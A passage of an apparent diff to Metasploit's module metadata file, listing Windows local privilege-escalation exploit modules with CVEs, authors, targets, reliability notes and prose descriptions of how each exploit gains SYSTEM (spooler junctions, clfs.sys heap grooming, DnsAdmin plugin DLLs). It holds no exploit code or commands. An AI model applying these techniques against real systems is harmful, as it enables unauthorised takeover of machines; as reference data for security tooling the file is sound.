v1803-21H2 x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/cve_2022_21882_win32k.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2022_21882_win32k", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2022_21999_spoolfool_privesc": { - "name": "CVE-2022-21999 SpoolFool Privesc", - "fullname": "exploit/windows/local/cve_2022_21999_spoolfool_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2022-02-08", - "type": "exploit", - "author": [ - "Oliver Lyak", - "Shelby Pace" - ], - "description": "The Windows Print Spooler has a privilege escalation vulnerability that\n can be leveraged to achieve code execution as SYSTEM.\n\n The `SpoolDirectory`, a configuration setting that holds the path that\n a printer's spooled jobs are sent to, is writable for all users, and it can\n be configured via `SetPrinterDataEx()` provided the caller has the\n `PRINTER_ACCESS_ADMINISTER` permission. 
If the `SpoolDirectory` path does not\n exist, it will be created once the print spooler reinitializes.\n\n Calling `SetPrinterDataEx()` with the `CopyFiles\\` registry key will load the\n dll passed in as the `pData` argument, meaning that writing a dll to the `SpoolDirectory`\n location can be loaded by the print spooler.\n\n Using a directory junction and UNC path for the `SpoolDirectory`, the exploit\n writes a payload to `C:\\Windows\\System32\\spool\\drivers\\x64\\4` and loads it\n by calling `SetPrinterDataEx()`, resulting in code execution as SYSTEM.", - "references": [ - "URL-https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81", - "CVE-2022-21999" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Auto" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/cve_2022_21999_spoolfool_privesc.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2022_21999_spoolfool_privesc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "SpoolFool" - ], - "Stability": [ - "crash-service-restarts" - ], - "Reliability": [ - "unreliable-session" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/cve_2022_26904_superprofile": { - "name": "User Profile Arbitrary Junction Creation Local Privilege Elevation", - "fullname": "exploit/windows/local/cve_2022_26904_superprofile", - "aliases": [], - "rank": 600, - "disclosure_date": "2022-03-17", - "type": "exploit", - "author": [ - "KLINIX5", - "Grant Willcox" - ], - "description": "The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability\n in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory 
structure of\n the junctions it tries to link together.\n\n Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a\n UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user.\n\n Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as\n CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for\n CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it\n as CVE-2022-26904.\n\n It is important to note that the credentials supplied for the second user to log in as in this exploit must be\n those of a normal non-admin user and these credentials must also corralate with a user who has already logged in\n at least once before. Additionally the current user running the exploit must have UAC set to the highest level,\n aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. 
Note however that\n \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances\n where this setting has been changed either manually or as part of the installation process.", - "references": [ - "CVE-2022-26904", - "URL-https://github.com/rmusser01/SuperProfile", - "URL-https://web.archive.org/web/20220222105232/https://halove23.blogspot.com/2022/02/blog-post.html", - "URL-https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 11" - ], - "mod_time": "2024-02-07 11:30:42 +0000", - "path": "/modules/exploits/windows/local/cve_2022_26904_superprofile.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2022_26904_superprofile", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs", - "screen-effects", - "audio-effects" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/cve_2022_3699_lenovo_diagnostics_driver": { - "name": "Lenovo Diagnostics Driver IOCTL memmove", - "fullname": "exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver", - "aliases": [], - "rank": 400, - "disclosure_date": "2022-11-09", - "type": "exploit", - "author": [ - "alfarom256", - "jheysel-r7" - ], - "description": "Incorrect access control for the Lenovo Diagnostics Driver allows a low-privileged user the ability to\n issue device IOCTLs to perform arbitrary physical/virtual memory read/write.", - "references": [ - "CVE-2022-3699", - "URL-https://github.com/alfarom256/CVE-2022-3699/" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - 
], - "mod_time": "2023-11-28 14:35:26 +0000", - "path": "/modules/exploits/windows/local/cve_2022_3699_lenovo_diagnostics_driver.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2022_3699_lenovo_diagnostics_driver", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2023_21768_afd_lpe": { - "name": "Ancillary Function Driver (AFD) for WinSock Elevation of Privilege", - "fullname": "exploit/windows/local/cve_2023_21768_afd_lpe", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-01-10", - "type": "exploit", - "author": [ - "chompie", - "b33f", - "Yarden Shafir", - "Christophe De La Fuente" - ], - "description": "A vulnerability exists in the Windows Ancillary Function Driver for Winsock\n (`afd.sys`) can be leveraged by an attacker to escalate privileges to those of\n NT AUTHORITY\\SYSTEM. 
Due to a flaw in `AfdNotifyRemoveIoCompletion`, it is\n possible to create an arbitrary kernel Write-Where primitive, which can be used\n to manipulate internal I/O ring structures and achieve local privilege\n escalation.\n\n This exploit only supports Windows 11 22H2 up to build 22621.963 (patched in\n January 2023 updates).", - "references": [ - "CVE-2023-21768", - "URL-https://github.com/xforcered/Windows_LPE_AFD_CVE-2023-21768", - "URL-https://github.com/yardenshafir/IoRingReadWritePrimitive" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 11 22H2 x64" - ], - "mod_time": "2023-04-04 09:48:51 +0000", - "path": "/modules/exploits/windows/local/cve_2023_21768_afd_lpe.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2023_21768_afd_lpe", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2023_28252_clfs_driver": { - "name": "Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability", - "fullname": "exploit/windows/local/cve_2023_28252_clfs_driver", - "aliases": [], - "rank": 400, - "disclosure_date": "2023-04-11", - "type": "exploit", - "author": [ - "Ricardo Narvaja", - "Esteban.kazimirow", - "jheysel-r7" - ], - "description": "A privilege escalation vulnerability exists in the clfs.sys driver which comes installed by default on\n Windows 10 21H2, Windows 11 21H2 and Windows Server 20348 operating systems.\n\n The clfs.sys driver contains a function CreateLogFile that is used to create\n open and edit '*.blf' (base log format) files. 
Inside a .blf file there are multiple blocks of data which\n contain checksums to verify the integrity of the .blf file and to ensure the file looks and acts like a\n .blf file. However, these files can be edited with CreateFileA or with fopen and then modified with\n WriteFile or fwrite respectively in order to change the contents of the file and update their checksums accordingly.\n\n This exploit makes use to two different kinds of specially crafted .blf files that are edited using the technique\n mentioned above. There are multiple spray .blf files. The spray .blf files are specially crafted to initiate an out of\n bounds read which reads from a contiguous block of memory. The block of memory it reads from contains a read-write pipe\n that points to the address of the second type of .blf file - the trigger .blf file. The trigger .blf file is specially\n crafted read the SYSTEM token and write it in the process of the exploit to achieve the local privilege escalation.\n\n The exploits creates a controlled memory space by first looping over the CreatePipe function to\n to create thousands of read-write pipes (which take up 0x90 bytes of memory). It then releases a certain number of\n pipes from memory and calls CreateLogFile to open the pre-existing spray .blf files which when being opened fill the\n 0x90 byte gaps created by the deallocation of the pipes in memory, creating the controlled memory space.\n\n This is a very brief and high overview description of what the exploit is actually doing. 
For a more detailed and in\n depth analysis please refer to the following [reference](https://github.com/fortra/CVE-2023-28252).", - "references": [ - "CVE-2023-28252", - "URL-https://github.com/fortra/CVE-2023-28252" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2023-09-11 13:10:57 +0000", - "path": "/modules/exploits/windows/local/cve_2023_28252_clfs_driver.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2023_28252_clfs_driver", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "unreliable-session" - ], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2024_30085_cloud_files": { - "name": "Windows Cloud File Mini Filer Driver Heap Overflow", - "fullname": "exploit/windows/local/cve_2024_30085_cloud_files", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-12-19", - "type": "exploit", - "author": [ - "Alex Birnberg", - "ssd-disclosure", - "bwatters-r7" - ], - "description": "This module exploits the Windows Cloud Files Mini FIlter Driver cldflt.sys on Windows workstation versions\n 10_1809 through 11_23H2 and Windows server versions 2022 to 22_23H2.", - "references": [ - "CVE-2024-30085", - "URL-https://attackerkb.com/topics/EHiwxpT2Dp/cve-2024-30085", - "URL-https://ssd-disclosure.com/ssd-advisory-cldflt-heap-based-overflow-pe/", - "URL-https://starlabs.sg/blog/2024/all-i-want-for-christmas-is-a-cve-2024-30085-exploit/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2025-01-10 16:14:32 +0000", - "path": "/modules/exploits/windows/local/cve_2024_30085_cloud_files.rb", - "is_install_path": true, - "ref_name": 
"windows/local/cve_2024_30085_cloud_files", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2024_30088_authz_basep": { - "name": "Windows Kernel Time of Check Time of Use LPE in AuthzBasepCopyoutInternalSecurityAttributes", - "fullname": "exploit/windows/local/cve_2024_30088_authz_basep", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-06-11", - "type": "exploit", - "author": [ - "tykawaii98", - "jheysel-r7" - ], - "description": "CVE-2024-30088 is a Windows Kernel Elevation of Privilege Vulnerability which affects many recent versions of Windows 10,\n Windows 11 and Windows Server 2022.\n\n The vulnerability exists inside the function called `AuthzBasepCopyoutInternalSecurityAttributes` specifically when\n the kernel copies the `_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION` of the current token object to user mode. When the\n kernel preforms the copy of the `SecurityAttributesList`, it sets up the list of the SecurityAttribute's structure\n directly to the user supplied pointed. 
It then calls `RtlCopyUnicodeString` and\n `AuthzBasepCopyoutInternalSecurityAttributeValues` to copy out the names and values of the `SecurityAttribute` leading\n to multiple Time Of Check Time Of Use (TOCTOU) vulnerabilities in the function.", - "references": [ - "URL-https://github.com/tykawaii98/CVE-2024-30088", - "CVE-2024-30038" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2025-03-13 13:14:13 +0000", - "path": "/modules/exploits/windows/local/cve_2024_30088_authz_basep.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2024_30088_authz_basep", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [ - "unreliable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/cve_2024_35250_ks_driver": { - "name": "Windows Access Mode Mismatch LPE in ks.sys", - "fullname": "exploit/windows/local/cve_2024_35250_ks_driver", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-06-11", - "type": "exploit", - "author": [ - "AngelBoy", - "varwara", - "jheysel-r7" - ], - "description": "The ks.sys driver on Windows is one of the core components of Kernel Streaming and is installed by default.\n There exists a LPE in this driver which can be exploited on many recent versions of Windows 10,\n Windows 11, Windows Server 2022.", - "references": [ - "URL-https://github.com/varwara/CVE-2024-35250", - "URL-https://devco.re/blog/2024/08/23/streaming-vulnerabilities-from-windows-kernel-proxying-to-kernel-part1-en/", - "URL-https://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html", - "CVE-2024-35250" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - 
"autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2024-11-06 09:13:51 +0000", - "path": "/modules/exploits/windows/local/cve_2024_35250_ks_driver.rb", - "is_install_path": true, - "ref_name": "windows/local/cve_2024_35250_ks_driver", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/dnsadmin_serverlevelplugindll": { - "name": "DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation", - "fullname": "exploit/windows/local/dnsadmin_serverlevelplugindll", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-05-08", - "type": "exploit", - "author": [ - "Shay Ber", - "Imran E. Dawoodjee " - ], - "description": "This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the\n `ServerLevelPluginDll` value using dnscmd.exe to create a registry key at `HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\`\n named `ServerLevelPluginDll` that can be made to point to an arbitrary DLL. After doing so, restarting the service\n will load the DLL and cause it to execute, providing us with SYSTEM privileges. Increasing WfsDelay is recommended\n when using a UNC path.\n\n Users should note that if the DLLPath variable of this module is set to a UNC share that does not exist,\n the DNS server on the target will not be able to restart. 
Similarly if a UNC share is not utilized, and\n users instead opt to drop a file onto the disk of the target computer, and this gets picked up by Anti-Virus\n after the timeout specified by `AVTIMEOUT` expires, its possible that the `ServerLevelPluginDll` value of the\n `HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\` key on the target computer may point to an nonexistant DLL,\n which will also prevent the DNS server from being able to restart. Users are advised to refer to the documentation for\n this module for advice on how to resolve this issue should it occur.\n\n This module has only been tested and confirmed to work on Windows Server 2019 Standard Edition, however it should work against any Windows\n Server version up to and including Windows Server 2019.", - "references": [ - "URL-https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", - "URL-https://adsecurity.org/?p=4064", - "URL-http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb", - "is_install_path": true, - "ref_name": "windows/local/dnsadmin_serverlevelplugindll", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "config-changes", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/docker_credential_wincred": { - "name": "Docker-Credential-Wincred.exe Privilege Escalation", - "fullname": "exploit/windows/local/docker_credential_wincred", - "aliases": [], - "rank": 0, - "disclosure_date": 
"2019-07-05", - "type": "exploit", - "author": [ - "Morgan Roman", - "bwatters-r7" - ], - "description": "This exploit leverages a vulnerability in docker desktop\n community editions prior to 2.1.0.1 where an attacker can write\n a payload to a lower-privileged area to be executed\n automatically by the docker user at login.", - "references": [ - "CVE-2019-15752", - "URL-https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/exploits/windows/local/docker_credential_wincred.rb", - "is_install_path": true, - "ref_name": "windows/local/docker_credential_wincred", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc": { - "name": "Druva inSync inSyncCPHwnet64.exe RPC Type 5 Privilege Escalation", - "fullname": "exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-02-25", - "type": "exploit", - "author": [ - "Chris Lyne", - "Matteo Malvica", - "bcoles " - ], - "description": "Druva inSync client for Windows exposes a network service on TCP\n port 6064 on the local network interface. 
inSync versions 6.6.3\n and prior do not properly validate user-supplied program paths\n in RPC type 5 messages, allowing execution of arbitrary commands\n as SYSTEM.\n\n This module has been tested successfully on inSync versions\n 6.5.2r99097 and 6.6.3r102156 on Windows 7 SP1 (x64).", - "references": [ - "CVE-2019-3999", - "CVE-2020-5752", - "EDB-48400", - "EDB-48505", - "EDB-49211", - "PACKETSTORM-157493", - "PACKETSTORM-157802", - "PACKETSTORM-160404", - "URL-https://www.tenable.com/security/research/tra-2020-12", - "URL-https://www.tenable.com/security/research/tra-2020-34", - "URL-https://github.com/tenable/poc/blob/master/druva/inSync/druva_win_cphwnet64.py", - "URL-https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc.rb", - "is_install_path": true, - "ref_name": "windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/gog_galaxyclientservice_privesc": { - "name": "GOG GalaxyClientService Privilege Escalation", - "fullname": "exploit/windows/local/gog_galaxyclientservice_privesc", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-04-28", - "type": "exploit", - "author": [ - "Joe Testa " - ], - "description": "This module will send arbitrary file_paths to the GOG GalaxyClientService, which will be executed\n with SYSTEM privileges (verified on GOG Galaxy Client v1.2.62 and v2.0.12; prior versions are\n also likely 
affected).", - "references": [ - "URL-https://www.positronsecurity.com/blog/2020-04-28-gog-galaxy-client-local-privilege-escalation/", - "CVE-2020-7352" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows (Dropper)" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/gog_galaxyclientservice_privesc.rb", - "is_install_path": true, - "ref_name": "windows/local/gog_galaxyclientservice_privesc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-safe" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/ikeext_service": { - "name": "IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL", - "fullname": "exploit/windows/local/ikeext_service", - "aliases": [], - "rank": 400, - "disclosure_date": "2012-10-09", - "type": "exploit", - "author": [ - "Ben Campbell " - ], - "description": "This module exploits a missing DLL loaded by the 'IKE and AuthIP Keyring Modules'\n (IKEEXT) service which runs as SYSTEM, and starts automatically in default\n installations of Vista-Win8. 
It requires an insecure bin path to plant the DLL payload.", - "references": [ - "URL-https://www.htbridge.com/advisory/HTB23108", - "URL-https://www.htbridge.com/vulnerability/uncontrolled-search-path-element.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/ikeext_service.rb", - "is_install_path": true, - "ref_name": "windows/local/ikeext_service", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/ipass_launch_app": { - "name": "iPass Mobile Client Service Privilege Escalation", - "fullname": "exploit/windows/local/ipass_launch_app", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-03-12", - "type": "exploit", - "author": [ - "h0ng10" - ], - "description": "The named pipe, \\IPEFSYSPCPIPE, can be accessed by normal users to interact\n with the iPass service. 
The service provides a LaunchAppSysMode command which\n allows to execute arbitrary commands as SYSTEM.", - "references": [ - "CVE-2015-0925", - "URL-https://www.mogwaisecurity.de/advisories/MSA-2015-03.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ipass_launch_app.rb", - "is_install_path": true, - "ref_name": "windows/local/ipass_launch_app", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/lenovo_systemupdate": { - "name": "Lenovo System Update Privilege Escalation", - "fullname": "exploit/windows/local/lenovo_systemupdate", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-04-12", - "type": "exploit", - "author": [ - "Michael Milvich", - "Sofiane Talmat", - "h0ng10" - ], - "description": "The named pipe, \\SUPipeServer, can be accessed by normal users to interact with the\n System update service. The service provides the possibility to execute arbitrary\n commands as SYSTEM if a valid security token is provided. This token can be generated\n by calling the GetSystemInfoData function in the DLL tvsutil.dll. 
Please, note that the\n System Update is stopped by default but can be started/stopped calling the Executable\n ConfigService.exe.", - "references": [ - "OSVDB-121522", - "CVE-2015-2219", - "URL-http://www.ioactive.com/pdfs/Lenovo_System_Update_Multiple_Privilege_Escalations.pdf" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/lenovo_systemupdate.rb", - "is_install_path": true, - "ref_name": "windows/local/lenovo_systemupdate", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/lexmark_driver_privesc": { - "name": "Lexmark Driver Privilege Escalation", - "fullname": "exploit/windows/local/lexmark_driver_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-07-15", - "type": "exploit", - "author": [ - "Jacob Baines", - "Shelby Pace", - "Grant Willcox" - ], - "description": "Various Lexmark Universal Printer drivers as listed at advisory TE953\n allow low-privileged authenicated users to elevate their privileges to\n SYSTEM on affected Windows systems by modifying the XML file at\n C:\\ProgramData\\\\Universal Color Laser.gdl\n to replace the DLL path to unires.dll with a malicious DLL path.\n\n When C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs is\n then used to add the printer to the affected system, PrintIsolationHost.exe,\n a Windows process running as NT AUTHORITY\\SYSTEM, will inspect the\n C:\\ProgramData\\\\Universal Color Laser.gdl file and will\n load the malicious DLL from the path specified in the file. 
This which will\n result in the malicious DLL executing as NT AUTHORITY\\SYSTEM.\n\n Once this module is finished, it will use the prnmngr.vbs script\n to remove the printer it added.", - "references": [ - "CVE-2021-35449", - "URL-http://support.lexmark.com/index?page=content&id=TE953", - "URL-https://github.com/jacob-baines/concealed_position", - "URL-https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20presentations/Jacob%20Baines%20-%20Bring%20Your%20Own%20Print%20Driver%20Vulnerability.pdf" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2023-02-08 15:20:32 +0000", - "path": "/modules/exploits/windows/local/lexmark_driver_privesc.rb", - "is_install_path": true, - "ref_name": "windows/local/lexmark_driver_privesc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "service-resource-loss" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/linqpad_deserialization_persistence": { - "name": "LINQPad Deserialization Exploit", - "fullname": "exploit/windows/local/linqpad_deserialization_persistence", - "aliases": [], - "rank": 300, - "disclosure_date": "2024-12-03", - "type": "exploit", - "author": [ - "msutovsky-r7 ", - "James Williams" - ], - "description": "This module exploits a bug in LIQPad up to version 5.48.00. The bug is only exploitable in paid version of software. The core of a bug is cache file containing deserialized data, which attacker can overwrite with malicious payload. 
The data gets deserialized every time the app restarts.", - "references": [ - "URL-https://trustedsec.com/blog/discovering-a-deserialization-vulnerability-in-linqpad", - "CVE-2024-53326" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2025-05-06 08:43:57 +0000", - "path": "/modules/exploits/windows/local/linqpad_deserialization_persistence.rb", - "is_install_path": true, - "ref_name": "windows/local/linqpad_deserialization_persistence", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/microfocus_operations_privesc": { - "name": "Micro Focus Operations Bridge Manager / Reporter Local Privilege Escalation", - "fullname": "exploit/windows/local/microfocus_operations_privesc", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-10-28", - "type": "exploit", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits an incorrectly permissioned folder in Micro Focus Operations Bridge\n Manager and Operations Bridge Reporter.\n An unprivileged user (such as Guest) can drop a JSP file in an exploded WAR directory and\n then access it without authentication by making a request to the OBM / OBR server.\n This will result in automatic code execution as SYSTEM. 
This module has been tested on\n OBM 2020.05 and OBR 10.40, but it should work out of the box on earlier versions too.\n Note that it is only exploitable on Windows installations.", - "references": [ - "URL-https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md", - "CVE-2020-11858", - "CVE-2020-11855", - "ZDI-20-1326", - "ZDI-20-1217" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 443, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Micro Focus Operations Bridge Manager (Windows) <= 2020.05", - "Micro Focus Operations Bridge Reporter (Windows) <= 10.40" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/local/microfocus_operations_privesc.rb", - "is_install_path": true, - "ref_name": "windows/local/microfocus_operations_privesc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/mov_ss": { - "name": "Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability", - "fullname": "exploit/windows/local/mov_ss", - "aliases": [], - "rank": 600, - "disclosure_date": "2018-05-08", - "type": "exploit", - "author": [ - "Nick Peterson", - "Nemanja Mulasmajic", - "Can Bölük ", - "bwatters-r7" - ], - "description": "This module exploits a vulnerability in a statement in the system programming guide\n of the Intel 64 and IA-32 architectures software developer's manual being mishandled\n in various operating system kerneles, resulting in unexpected behavior for #DB\n excpetions that are deferred by MOV SS or POP SS.\n\n This module will upload the pre-compiled exploit and use it to 
